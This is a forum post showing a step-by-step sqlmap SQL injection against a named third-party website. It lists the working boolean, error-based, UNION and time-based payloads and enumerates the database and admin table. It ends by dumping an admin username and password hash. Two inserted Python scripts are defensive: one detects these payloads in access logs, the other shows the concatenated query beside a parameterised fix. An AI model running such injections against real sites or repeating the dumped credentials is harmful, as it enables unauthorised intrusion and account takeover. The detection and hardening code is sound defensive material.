China Network Penetration Testing Alliance

Title: sqlmap example: injecting MySQL

Author: admin    Time: 2013-4-4 22:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58
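The four injection techniques sqlmap lists above (boolean-based blind, error-based, UNION, time-based) each leave a recognisable pattern in the web server's access log, even though this particular run shows "0 HTTP(s) requests" because it resumes from a saved session. The following Python script is an added example, not part of the original post: it parses Apache combined-format log lines, decodes the query string, flags each technique class and groups the hits per client. The sample log lines are constructed here to mirror the payloads above, with client addresses from documentation ranges; the User-Agent check assumes an unmodified sqlmap default agent string, which a client can change, so it is only a secondary signal.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/Nginx combined log format: client, identity, user, time, request, status, bytes, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# One signature per technique class reported against article.php?id=276 above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based (FLOOR/RAND)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

# Constructed sample log lines (not real traffic); '#' is percent-encoded as a client would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Apr/2013:16:50:01 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Apr/2013:16:53:10 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '198.51.100.7 - - [04/Apr/2013:16:53:11 +0800] "GET /article.php?id=276%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '198.51.100.7 - - [04/Apr/2013:16:53:12 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23 HTTP/1.1" 200 812 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '198.51.100.7 - - [04/Apr/2013:16:53:13 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 0 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
]


def classify_request(target):
    """Return the technique names whose signature matches any percent-decoded query value.
    Matching happens after decoding, because the logged request line is still URL-encoded."""
    query = urlsplit(target).query
    hits = []
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for technique, pattern in SIGNATURES.items():
            if pattern.search(value) and technique not in hits:
                hits.append(technique)
    return hits


def scan_log(lines):
    """Parse each access-log line and collect the requests that carry an injection signature
    or the default sqlmap User-Agent (assumption: the agent string was not overridden)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        techniques = classify_request(m["target"])
        sqlmap_ua = "sqlmap" in m["ua"].lower()
        if techniques or sqlmap_ua:
            findings.append({"ip": m["ip"], "time": m["time"], "target": m["target"],
                             "techniques": techniques, "sqlmap_ua": sqlmap_ua})
    return findings


def summarize_by_client(findings):
    """Group findings per source address: request count and the set of techniques seen.
    Several distinct techniques from one client in a short window is the typical scanner profile."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["ip"], {"requests": 0, "techniques": set(), "sqlmap_ua": False})
        entry["requests"] += 1
        entry["techniques"].update(f["techniques"])
        entry["sqlmap_ua"] = entry["sqlmap_ua"] or f["sqlmap_ua"]
    return summary


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["techniques"], "sqlmap UA" if f["sqlmap_ua"] else "")
    for ip, entry in summarize_by_client(scan_log(SAMPLE_LOG)).items():
        print(ip, entry["requests"], "requests,", sorted(entry["techniques"]))
```

The benign request for `id=276` produces no finding; the four probes are each attributed to one technique and roll up to a single client that used all four, which is the signal worth alerting on rather than any single regex hit.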

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
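The whole sequence above, from identifying the injection point to dumping the admin table, rests on one defect: the value of `id` is pasted into the SQL text of `article.php`. The following Python script is an added example, not code from the original post or from the site in question. It uses an in-memory SQLite table as a constructed stand-in for the MySQL `article` table, shows a lookup built by string concatenation that reacts differently to a true and a false appended comparison (the `276 AND 799=799` payload sqlmap reported, and a constructed false counterpart), and beside it the hardened lookup that validates the type and binds the value as a parameter, so the same input is refused and the true/false difference that boolean-based blind injection measures disappears.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's 'article' table (rows and titles are invented)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO article VALUES (?, ?)",
        [(275, "Issue 12 editorial"), (276, "Contributor profile"), (277, "Image gallery")],
    )
    return conn


def fetch_article_vulnerable(conn, raw_id):
    """The pattern behind the injection points sqlmap reported: the request parameter is
    concatenated into the SQL text, so anything it contains is parsed as SQL."""
    sql = "SELECT id, title FROM article WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn, raw_id):
    """Hardened lookup: refuse anything that is not a plain integer, then bind the value
    as a parameter so it travels as data and can never become SQL syntax."""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute("SELECT id, title FROM article WHERE id = ?", (int(raw_id),)).fetchall()


def blind_difference(conn, fetch):
    """True when a true and a false appended comparison give different results for the
    given lookup; that observable difference is exactly what boolean-based blind injection
    relies on.  A lookup that refuses the input shows no difference at all."""
    true_cond = "276 AND 799=799"   # the boolean-based payload sqlmap reported above
    false_cond = "276 AND 799=800"  # constructed false counterpart
    try:
        return fetch(conn, true_cond) != fetch(conn, false_cond)
    except ValueError:
        return False


def rejects(conn, raw_id):
    """True when the hardened lookup refuses the input instead of passing it to SQL."""
    try:
        fetch_article_safe(conn, raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true condition :", fetch_article_vulnerable(db, "276 AND 799=799"))
    print("vulnerable, false condition:", fetch_article_vulnerable(db, "276 AND 799=800"))
    print("blind signal, vulnerable   :", blind_difference(db, fetch_article_vulnerable))
    print("blind signal, hardened     :", blind_difference(db, fetch_article_safe))
    print("hardened rejects payload   :", rejects(db, "276 AND 799=799"))
```

The validation step is deliberate: binding alone already stops the input from being parsed as SQL, but rejecting non-integer ids up front also keeps the application from quietly returning an empty page for malformed input, which is what a scanner would otherwise keep probing.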

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2